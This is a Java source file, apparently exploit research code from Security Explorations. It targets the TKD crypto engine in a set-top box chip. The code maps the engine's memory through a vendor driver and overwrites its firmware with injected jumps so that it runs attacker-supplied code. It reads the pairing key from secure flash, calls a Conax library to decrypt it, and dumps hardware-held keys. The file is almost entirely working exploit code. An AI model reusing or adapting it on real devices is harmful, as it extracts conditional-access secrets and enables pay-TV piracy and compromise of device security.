/*## (c) SECURITY EXPLORATIONS    2011 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.*;

public class STTKDMA {
 public static final String STTKDMA_DEVICE = "/tmp/sttkdma_ioctl";

 public static final int BASE      = 0xFE248000;

 public static final int DATA      = 0x4000;
 public static final int CODE      = 0x6000;

 public static final int CODE_SIZE = 0x2000;

 public static final int INPUT     = DATA+0x140;
 public static final int OUTPUT    = DATA+0x150;
 public static final int KEYS      = 0x3420;

 public static final int copAES    = 0x00f54000;
 public static final int copTDES   = 0x00fa4000;

 public static final int waitAES   = 0x008d8abc;
 public static final int waitTDES  = 0x008e1abc;

 public static final int SCK_KEY   = 0x00;
 public static final int CWPK_KEY  = 0x00;
 public static final int CWPK1_KEY = 0x01;
 public static final int MAGIC_KEY = 0x15;
 public static final int REGS      = 0xff;

 public static final int ENCRYPT   = 0x00;
 public static final int DECRYPT   = 0x01;

 public static final int KEY_CWPK  = 0x05;
 public static final int KEY_ID    = 0xf0;

 public static final int MAGIC_IDX = 0x05;

 public static final int MAXKEY    = 0x08;

 public static final int CW_BASE_KEY_IDX = 0x20;

 public static final int tkd_code[] = {
  0x00e61234, //mov r6,#1234 TKD_CMD_HI
  0x00e55678, //mov r5,#5678 TKD_CMD_LO
  0x00e00000, //mov r0,#0000
  0x00756210, //mov r5,(r6<<16)|r5
  0x00e00000, //mov r0,#0000
  0x00fa4000, //COPINS
  0x00e00000, //mov r0,#0000
  0x000f053c, //mov r15,r5
  0x00e00000, //mov r0,#0000
  0x008e1abc, //WAITINS
  0x00e00000, //mov r0,#0000
  0x00af0050, //ld r15,[r0,0050]
  0x00af0051, //ld r15,[r0,0051]
  0x00af0052, //ld r15,[r0,0052]
  0x00af0053, //ld r15,[r0,0053]
  0x00e00000, //mov r0,#0000
  0x008e1abc, //WAITINS
  0x00e00000, //mov r0,#0000
  0x00b0f054, //st r15,[r0,0054]
  0x00b0f055, //st r15,[r0,0055]
  0x00b0f056, //st r15,[r0,0056]
  0x00b0f057, //st r15,[r0,0057]
  0x00e00000  //mov r0,#0000
 };

 static int mem;
 static int handle;
 static int mopen;
 static int mclose;
 static int mread;
 static int mwrite;

 private static int GET_CHIPID_START_OFF; //0x01a3
 private static int GET_CHIPID_END_OFF;   //0x01a7
 private static int SLIM_CODE_END_OFF;    //0x05b7

 private static int chip_id;
 private static int rfs_cwpk[];
 private static int enc_cwpk[];
 private static int cwpk[];

 static {
  mem=NativeCode.getInstance().malloc(0x10);
  Utils.memset(mem,0,0x10);

  handle=Dl.open_flags("libstd_drv_mem.so",Dl.RTLD_NOW|Dl.RTLD_NODELETE);
  mopen=Dl.getsym(handle,"MEM_Open");
  mclose=Dl.getsym(handle,"MEM_Close");
  mread=Dl.getsym(handle,"MEM_Read32");
  mwrite=Dl.getsym(handle,"MEM_Write32");

  int addr=BASE;
  int size=0x8000;

  Memory.write_dword(mem,addr);
  Memory.write_dword(mem+4,size);

  int res=NativeCode.getInstance().invoke(mopen,mem,0,0,0,0,0,0,0);

  calc_offsets();

  chip_id=read_publicid();
  init_pairing_key();

  init_cwpk1();
 }

 private static int swap(int val) {
  int b1=(val)&0xff;
  int b2=(val>>8)&0xff;
  int b3=(val>>16)&0xff;
  int b4=(val>>24)&0xff;

  return (b1<<24)|(b2<<16)|(b3<<8)|b4;
 }

 private static void init_cwpk1() {
  int cwpk1[]=new int[4];

  for(int i=0;i<4;i++) {
   cwpk1[i]=swap(enc_cwpk[i]);
  }

  set_input(cwpk1);

  tkd_cmd(CWPK1_KEY,REGS,SCK_KEY,ENCRYPT);
 }

 private static void decrypt_cwpk() {
  tkd_cmd(MAGIC_KEY,CWPK_KEY,SCK_KEY,DECRYPT);

  int sck_decrypted_cwpk[]=get_key(MAGIC_IDX);

  set_input(sck_decrypted_cwpk);

  tkd_cmd(REGS,REGS,SCK_KEY,ENCRYPT);

  cwpk=get_output();

  int reverse_cwpk[]=new int[4];
  reverse_cwpk[0]=cwpk[3];
  reverse_cwpk[1]=cwpk[2];
  reverse_cwpk[2]=cwpk[1];
  reverse_cwpk[3]=cwpk[0];

  set_key(MAGIC_IDX+1,reverse_cwpk);
 }

 private static void init_pairing_key() {
  int fd=Syscall.open("/mnt/flash/secure/7/0",FSDefs.O_RDONLY);

  if (fd>0) {
   int ptr=NativeCode.getInstance().malloc(0x20);
   Utils.memset(ptr,0,0x20);

   FS.sys_read_fully(fd,ptr,0x20);

   int key_type=Memory.read_byte(ptr+0x09);
   int key_id=Memory.read_byte(ptr+0x0a);

   if ((key_type==KEY_CWPK)&&(key_id==KEY_ID)) {
    rfs_cwpk=new int[4];

    for(int i=0;i<4;i++) {
     rfs_cwpk[i]=Memory.read_dword(ptr+0x0c+4*i);
    }

    int handle=Dl.open_flags("/lib/cai/libstd_cai_client_conax7.so",Dl.RTLD_NOW|Dl.RTLD_NODELETE);
    int func=Dl.getsym(handle,"cpm_SecGetDecryptedKeyPtr");

    if (func>0) {
     int key=NativeCode.getInstance().invoke(func,0,ptr+0x0c,0x10,0,0,0,0,0);

     enc_cwpk=new int[4];
 
     for(int i=0;i<4;i++) {
      enc_cwpk[i]=Memory.read_dword(key+4*i);
     }

     decrypt_cwpk();  
    }
   }

   Syscall.close(fd);
  }
 }

 private static void calc_offsets() {
  for(int i=0;i<CODE_SIZE;i+=4) {
   int opcode=tkdma_read(CODE+i);

   if (opcode==0x00b00009) {
    opcode=tkdma_read(CODE+i+4);

    if (opcode==0x00b0000a) {
     opcode=tkdma_read(CODE+i+8);

     if (opcode==0x00b0000b) {
      GET_CHIPID_START_OFF=(i-4)>>2;
      GET_CHIPID_END_OFF=(i+12)>>2;
     }
    }
   } else

   if (opcode==0x00a20202) {
    opcode=tkdma_read(CODE+i+4);

    if (opcode==0x00840d00) {
     SLIM_CODE_END_OFF=(i+8)>>2;
    }
   }

  }
 }

 public static int tkdma_read(int off) {
  return NativeCode.getInstance().invoke(mread,mem,BASE+off,0,0,0,0,0,0);
 }

 public static void tkdma_write(int off,int val) {
  NativeCode.getInstance().invoke(mwrite,mem,BASE+off,val,0,0,0,0,0);
 }

 public static int read_publicid() {
  int buf=NativeCode.getInstance().malloc(0x40);   
  Utils.memset(buf,0,0x40);

  int res=0;

  int fd=Syscall.open(STTKDMA_DEVICE,2);
  
  if (fd>0) {
   TkdHandler.lock();

   Syscall.ioctl(fd,0x80145A07,buf);

   TkdHandler.unlock();

   Syscall.close(fd);
  
   res=Memory.read_dword(buf+0x04);
  }

  NativeCode.getInstance().free(buf);

  return res;
 }

 private static int JMP_INS(int off) {
  int opcode=0x00d00010|((off&0xfff0)<<4)|(off&0xf); 
  return opcode;
 }

 public static void run_slim_code(int code[]) {
  int off=CODE+SLIM_CODE_END_OFF*4;

  for(int i=0;i<code.length;i++) {
   int val=code[i];

   if ((val&0xfff)==0xabc) {
    val=(val&0xfffff000)|(SLIM_CODE_END_OFF+i);
   }

   tkdma_write(off+4*i,val);
  }

  tkdma_write(off+4*code.length,JMP_INS(GET_CHIPID_END_OFF));

  off=CODE+GET_CHIPID_START_OFF*4;

  tkdma_write(off,JMP_INS(SLIM_CODE_END_OFF));

  read_publicid();
 }

 public static void slim_op(int tkd_cmd,int copins,int waitins) {
  tkd_code[0]=(tkd_code[0]&0xffff0000)|((tkd_cmd>>16)&0xffff);
  tkd_code[1]=(tkd_code[1]&0xffff0000)|((tkd_cmd)&0xffff);
  tkd_code[5]=copins;
  tkd_code[9]=waitins;
  tkd_code[16]=waitins;

  run_slim_code(tkd_code);
 }

 public static void tkd_cmd(int dest,int input,int key,int ctrl) {
  int cmd=((dest&0xff)<<24)|((input&0xff)<<16)|((key&0xff)<<8)|(ctrl&0xff);

  slim_op(cmd,copTDES,waitTDES);
 }

 public static int get_chip_id() {
  return chip_id;
 }

 public static int[] get_rfs_cwpk() {
  return rfs_cwpk;
 }

 public static int[] get_enc_cwpk() {
  return enc_cwpk;
 }

 public static int[] get_cwpk() {
  return cwpk;
 }

 public static int[] get_key(int idx) {
  int key[]=new int[4];
  key[0]=tkdma_read(KEYS+idx*0x10);
  key[1]=tkdma_read(KEYS+idx*0x10+0x04);
  key[2]=tkdma_read(KEYS+idx*0x10+0x08);
  key[3]=tkdma_read(KEYS+idx*0x10+0x0c);

  return key;
 }

 public static int[] get_input() {
  int data[]=new int[4];
  data[0]=tkdma_read(INPUT);
  data[1]=tkdma_read(INPUT+0x04);
  data[2]=tkdma_read(INPUT+0x08);
  data[3]=tkdma_read(INPUT+0x0c);

  return data;
 }

 public static void set_key(int idx,int cw[]) {
  tkdma_write(KEYS+idx*0x10,cw[0]);
  tkdma_write(KEYS+idx*0x10+0x04,cw[1]);

  if (cw.length==2) {
   tkdma_write(KEYS+idx*0x10+0x08,cw[0]);
   tkdma_write(KEYS+idx*0x10+0x0c,cw[1]);
  } else {
   tkdma_write(KEYS+idx*0x10+0x08,cw[2]);
   tkdma_write(KEYS+idx*0x10+0x0c,cw[3]);
  }
 }

 public static void set_input(int input[]) {
  tkdma_write(INPUT,input[0]);
  tkdma_write(INPUT+0x04,input[1]);

  if (input.length==2) {
   tkdma_write(INPUT+0x08,input[0]);
   tkdma_write(INPUT+0x0c,input[1]);
  } else {
   tkdma_write(INPUT+0x08,input[2]);
   tkdma_write(INPUT+0x0c,input[3]);
  }
 }

 public static int[] get_output() {
  int data[]=new int[4];
  data[0]=tkdma_read(OUTPUT);
  data[1]=tkdma_read(OUTPUT+0x04);
  data[2]=tkdma_read(OUTPUT+0x08);
  data[3]=tkdma_read(OUTPUT+0x0c);

  return data;
 }

 public static void DumpKeys() {
  int buf=NativeCode.getInstance().malloc(MAXKEY*0x10);  

  ApiMonitor.log("STTKDMA Keys");

  for(int i=0;i<MAXKEY*0x10;i+=4) {
   int val=tkdma_read(KEYS+i);
   Memory.write_dword(buf+i,val);
  }

  byte tab[]=Utils.buf2barray(buf,MAXKEY*0x10);
  ApiMonitor.log_buf(tab);

  NativeCode.getInstance().free(buf);  
 } 

 public static void DumpInput() {
  int buf=NativeCode.getInstance().malloc(0x10);  

  ApiMonitor.log("STTKDMA Input");

  for(int i=0;i<0x10;i+=4) {
   int val=tkdma_read(INPUT+i);
   Memory.write_dword(buf+i,val);
  }

  byte tab[]=Utils.buf2barray(buf,0x10);
  ApiMonitor.log_buf(tab);

  NativeCode.getInstance().free(buf);  
 } 

 public static int read_publicid(boolean show) {
  int buf=NativeCode.getInstance().malloc(0x40);   
  Utils.memset(buf,0,0x40);

  int fd=Syscall.open("/tmp/sttkdma_ioctl",2);

  int res=Syscall.ioctl(fd,0x80145A07,buf);

  if (show) {
   byte tab[]=Utils.buf2barray(buf,0x10);
   ApiMonitor.log_buf(tab);
  }
   
  Syscall.close(fd);

  res=Memory.read_dword(buf+0x08);

  NativeCode.getInstance().free(buf);

  return res;
 }

 public static void run_code(int code[]) {
  int off=0x6000+0x05b7*4;

  for(int i=0;i<code.length;i++) {
   int val=code[i];

   if ((val&0xfff)==0xabc) {
    val=(val&0xfffff000)|(0x05b7+i);
   }

   tkdma_write(off+4*i,val);
  }

  //jmp 01a7
  tkdma_write(off+4*code.length,0x00d01a17);

  off=0x6000+0x01a3*4;

  //jmp 05b7
  tkdma_write(off,0x00d05b17);

  ApiMonitor.log("ok");

  read_publicid(true);
 }

}
